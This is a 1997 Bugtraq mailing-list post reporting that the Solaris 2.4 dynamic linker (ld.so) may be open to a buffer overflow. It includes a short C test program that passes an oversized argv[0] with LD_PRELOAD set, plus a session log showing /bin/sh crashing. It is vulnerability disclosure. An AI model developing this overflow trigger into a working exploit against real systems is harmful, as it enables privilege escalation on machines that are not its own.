Bugtraq mailing list archives
Solaris ld.so possibly vulnerable?
From: dan () DIMSUM TCH HARVARD EDU (Dan Fleisher)
Date: Fri, 18 Jul 1997 11:40:28 -0400
Hi, here are the results of a test which indicate that Solaris (2.4 at least) ld.so might be vulnerable to this overflow:

Script started on Fri Jul 18 11:22:08 1997
bash$ id
uid=2011(dan) gid=110(chnd)
bash$ uname -a
SunOS dimsum 5.4 Generic_101945-10 sun4m sparc
bash$ cat sot.c
main(int argc, char **argv)
{
    char b[2048];
    char err[] = "bad args\n";
    char err2[] = "execl failed\n";

    if(argc != 2) {
        write(2, err, sizeof(err));
        exit(1);
    }
    memset(b, 'A', sizeof(b));
    putenv("LD_PRELOAD=foobar");
    execl(argv[1], b, 0);
    write(2, err2, sizeof(err2));
}
bash$ sot /bin/sh
Segmentation Fault (core dumped)
bash$ exit
script done on Fri Jul 18 11:22:47 1997

---
Dan Fleisher <dan () dimsum tch harvard edu>